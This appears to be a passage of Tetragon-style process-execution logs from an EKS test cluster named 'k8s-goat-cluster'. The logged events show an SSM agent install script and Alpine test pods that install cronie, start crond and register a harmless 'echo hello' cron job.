{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NDc5OTgwOTQ2MTI3MzU6Njg1MjQx","pid":685241,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/sh","arguments":"-c /var/lib/amazon/ssm/i-0c5e1c240cc9ded14/document/orchestration/a64702f9-22d8-4818-955d-c3f91e40b28e/installLinuxAgents/_script.sh","flags":"execve clone","start_time":"2025-09-16T18:28:53.528511107Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NDc5OTc5MjA4ODMyNDg6Njg1MjMz","tid":685241,"in_init_tree":false},"parent":{"exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NDc5OTc5MjA4ODMyNDg6Njg1MjMz","pid":685233,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/ssm-document-worker","arguments":"a64702f9-22d8-4818-955d-c3f91e40b28e","flags":"execve clone","start_time":"2025-09-16T18:28:53.354781242Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo2OTYzNjcyODMzODoyOTM0","tid":685233,"in_init_tree":false},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo2OTYzNjcyODMzODoyOTM0","pid":2934,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/ssm-agent-worker","flags":"execve clone","start_time":"2025-09-05T19:10:05.070627358Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo2ODU4MTE5MDUxOToyODkw","tid":2934,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo2ODU4MTE5MDUxOToyODkw","pid":2890,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/amazon-ssm-agent","flags":"execve clone","start_time":"2025-09-05T19:10:04.015089285Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDozODQ5NzQ0MjU1Mjox","tid":2890,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDozODQ5NzQ0MjU1Mjox","pid":1,"uid":0,"binary":"<kernel>","flags":"execve","start_time":"2025-09-05T19:09:33.931341072Z","auid":0,"parent_exec_id":"aXAtMTkyLTE2OC0zNi0yMC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","refcnt":1,"tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-36-20.us-west-2.compute.internal","time":"2025-09-16T18:28:53.528510573Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2d","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-36-20.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az4","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2d"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTc0MjgwNDYzMjEwNzg6NzE1MTYx","pid":715161,"uid":0,"cwd":"/","binary":"/usr/sbin/crond","arguments":"-f -d 8","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:04:14.479538917Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-daemon-test","container":{"id":"containerd://82cb21c08b0130c0fe692da0b25d603038cb219ac8d780349862643b9896eb8c","name":"cron-daemon-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:04:13Z","pid":1,"security_context":{}},"pod_labels":{"run":"cron-daemon-test"},"workload":"cron-daemon-test","workload_kind":"Pod"},"docker":"82cb21c08b0130c0fe692da0b25d603","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTc0Mjc0MDc5MzYwNTY6NzE1MTYx","tid":715161,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTc0Mjc0MDc5MzYwNTY6NzE1MTYx","pid":715161,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && crond -f -d 8\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:04:13.841154526Z","auid":4294967295,"docker":"82cb21c08b0130c0fe692da0b25d603","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","tid":715161,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","pid":714173,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:38.065522478Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","tid":714173,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","pid":714164,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 start","flags":"execve clone","start_time":"2025-09-16T21:02:38.057121279Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714164,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:04:14.479538941Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTc0MTIwMjI0ODg2NTM6NzE1MDYy","pid":715062,"uid":0,"cwd":"/","binary":"/usr/bin/crontab","arguments":"mycron","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:03:58.455706090Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-cli-test","container":{"id":"containerd://ad3290d263708ca5710b831c3e80b33b146624b1a2dacfaf5bcb115d7d5aaba9","name":"cron-cli-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:03:57Z","pid":11,"security_context":{}},"pod_labels":{"run":"cron-cli-test"},"workload":"cron-cli-test","workload_kind":"Pod"},"docker":"ad3290d263708ca5710b831c3e80b33","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTc0MTE0MDczNDEzOTg6NzE1MDQ2","tid":715062,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTc0MTE0MDczNDEzOTg6NzE1MDQ2","pid":715046,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && echo '* * * * * echo hello' > mycron && crontab mycron && sleep 60\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:03:57.840559203Z","auid":4294967295,"docker":"ad3290d263708ca5710b831c3e80b33","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg2MDczMDEwODU6NzE0NDcy","tid":715046,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg2MDczMDEwODU6NzE0NDcy","pid":714472,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:55.040518317Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg1OTkzMTc3MzQ6NzE0NDY0","tid":714472,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDg1OTkzMTc3MzQ6NzE0NDY0","pid":714464,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id fa9534cb3ffbd524705259966c1a26e32b9594c9710e1e1b3983b015c1d28208 start","flags":"execve clone","start_time":"2025-09-16T21:02:55.032534941Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714464,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:03:58.455705622Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNzgwNTI0NTkxNjE6NzE0Nzc4","pid":714778,"uid":0,"cwd":"/","binary":"/usr/sbin/crond","arguments":"-f -d 8","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:03:24.485677434Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-daemon-test","container":{"id":"containerd://1a8ada0c0e376a25d58f032d658eae0269fbfcbbc937da96104470446a5cc6a9","name":"cron-daemon-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:03:23Z","pid":1,"security_context":{}},"pod_labels":{"run":"cron-daemon-test"},"workload":"cron-daemon-test","workload_kind":"Pod"},"docker":"1a8ada0c0e376a25d58f032d658eae0","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNzc0MDcwOTI4MTM6NzE0Nzc4","tid":714778,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNzc0MDcwOTI4MTM6NzE0Nzc4","pid":714778,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && crond -f -d 8\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:03:23.840310019Z","auid":4294967295,"docker":"1a8ada0c0e376a25d58f032d658eae0","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","tid":714778,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","pid":714173,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:38.065522478Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","tid":714173,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","pid":714164,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 start","flags":"execve clone","start_time":"2025-09-16T21:02:38.057121279Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714164,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:03:24.485676195Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNTEwNDM4MTcxODk6NzE0NTY5","pid":714569,"uid":0,"cwd":"/","binary":"/usr/sbin/crond","arguments":"-f -d 8","flags":"execve rootcwd inInitTree","start_time":"2025-09-16T21:02:57.477035060Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-daemon-test","container":{"id":"containerd://79e604da23f54ed30f81a92220768838ac9d46a4f8e7c613a3d4acf1ad3fe037","name":"cron-daemon-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:02:56Z","pid":1,"security_context":{}},"pod_labels":{"run":"cron-daemon-test"},"workload":"cron-daemon-test","workload_kind":"Pod"},"docker":"79e604da23f54ed30f81a9222076883","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNTA0MDY4MTc5MjE6NzE0NTY5","tid":714569,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNTA0MDY4MTc5MjE6NzE0NTY5","pid":714569,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && crond -f -d 8\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:02:56.840035415Z","auid":4294967295,"docker":"79e604da23f54ed30f81a9222076883","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","tid":714569,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MzIzMDUyNzE6NzE0MTcz","pid":714173,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T21:02:38.065522478Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","tid":714173,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczMzE2MjM5MDQwOTc6NzE0MTY0","pid":714164,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id bafdfa9110bb8d87c338f4f8b1305afe90b36d1e2a9e3bad3fd79ca82cf96d18 start","flags":"execve clone","start_time":"2025-09-16T21:02:38.057121279Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":714164,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T21:02:57.477034166Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNTAwNTgyOTA2NDY6NzE0NTQ2","pid":714546,"uid":0,"cwd":"/","binary":"/usr/bin/crontab","arguments":"mycron","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-16T21:02:56.491507844Z","auid":4294967295,"pod":{"namespace":"default","name":"cron-cli-test","container":{"id":"containerd://df6701b020f964add6a9b1cc493925e6625afc2cad0593aa3d98a1e8a29a7cfe","name":"cron-cli-test","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:latest"},"start_time":"2025-09-16T21:02:55Z","pid":10,"security_context":{}},"pod_labels":{"run":"cron-cli-test"},"workload":"cron-cli-test","workload_kind":"Pod"},"docker":"df6701b020f964add6a9b1cc493925e","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDkzNzczMzkzMDY6NzE0NTI5","tid":714546,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTczNDkzNzczMzkzMDY6NzE0NTI5","pid":714529,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"apk add --no-cache cronie && echo '* * * * * echo hello' > mycron && crontab mycron && sleep 60\"","flags":"execve rootcwd clone 